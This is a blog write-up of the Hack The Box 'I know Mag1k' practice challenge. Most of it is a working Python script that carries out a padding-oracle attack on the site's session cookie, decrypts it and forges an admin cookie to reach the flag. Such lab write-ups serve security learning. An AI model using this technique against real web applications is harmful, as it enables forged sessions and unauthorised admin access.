Post

HackTheBox I know Mag1k Writeup

Posted
By x3ric
2 min read

Explore the basics of cybersecurity in the I know Mag1k Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/10

Description

Can you get to the profile page of the admin?

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

#!/usr/bin/env python3
import requests
from pwn import b64d, b64e, log, re, sys, xor
from urllib.parse import quote, unquote

def oracle(cookie: str) -> bool:
    global url
    global phpsessid
    r = requests.get(f'{url}/profile.php', cookies={
        'PHPSESSID': phpsessid,
        'iknowmag1k': cookie
    })
    return r.status_code != 500

def decrypt_block(ct_block: bytes, poa) -> bytes:
    dec = [0] * 8
    k = []
    poa.status('0 / 8')
    for i in range(8):
        for b in range(256):
            block = bytes([0] * (7 - i) + [b] + k)
            cookie = quote(b64e(block + ct_block))
            if oracle(cookie):
                poa.status(f'{i + 1} / 8')
                dec[7 - i] = b ^ (i + 1)
                k = [(i + 2) ^ dec[7 - j] for j in range(i + 1)][::-1]
                break
    return bytes(dec)

def main():
    global url
    global phpsessid
    if len(sys.argv) != 2:
        print(f'Usage: python {sys.argv[0]} <host:port>')
        exit(1)
    url = f'http://{sys.argv[1]}'
    s = requests.session()
    s.post(f'{url}/register.php', data={
        'username': 'a',
        'email': 'a@a.com',
        'password': 'a1b2c3d4',
        'confirm': 'a1b2c3d4'
    })
    s.post(f'{url}/login.php', data={
        'username': 'a',
        'password': 'a1b2c3d4',
    })
    phpsessid = s.cookies['PHPSESSID']
    iknowmag1k = s.cookies['iknowmag1k']
    log.info(f'PHPSESSID: {phpsessid}')
    log.info(f'iknowmag1k: {iknowmag1k}')
    iknowmag1k = b64d(unquote(iknowmag1k))
    blocks = [iknowmag1k[i:i + 8] for i in range(0, len(iknowmag1k), 8)]
    plaintext = b''
    dec_prog = log.progress('Decrypted')
    enc_prog = log.progress('Encrypted')
    poa = log.progress('Bytes')
    for m in range(len(blocks) - 1):
        current_block = blocks[-1 - m]
        prev_block = blocks[-2 - m]
        dec = decrypt_block(current_block, poa)
        plaintext = xor(dec, prev_block) + plaintext
        dec_prog.status(str(plaintext))
    dec_prog.success(str(plaintext))
    want = b'{"user":"a","role":"admin"}\x02\x02'
    ct = b'\0' * 8
    encrypted = b''
    while want:
        block, want = want[-8:], want[:-8]
        dec = decrypt_block(ct[:8], poa)
        ct = xor(bytes(dec), block) + ct
        assert oracle(quote(b64e(ct)))
        encrypted = block + encrypted
        enc_prog.status(str(encrypted))
    cookie = quote(b64e(ct))
    poa.success()
    enc_prog.success(cookie)
    r = requests.get(f'{url}/profile.php', cookies={
        'PHPSESSID': phpsessid,
        'iknowmag1k': cookie
    })
    log.success('Flag: ' + re.findall(r'HTB\{.*?\}', r.text)[0])

if __name__ == '__main__':
    main()

Summary

The I Know Mag1k Challenge on Hack The Box is an easy-level challenge involving session cookie manipulation and encryption reversal. The goal is to craft a valid admin session by decrypting the iknowmag1k cookie and modifying it. By using an oracle function to test for valid cookies and leveraging XOR operations, participants can decrypt the cookie, revealing the necessary information to access the admin profile page. This challenge introduces important concepts in web security, including session management and cryptographic attacks.

challenge
htb challenge writeup linux crypto
This post is licensed under CC BY 4.0 by the author.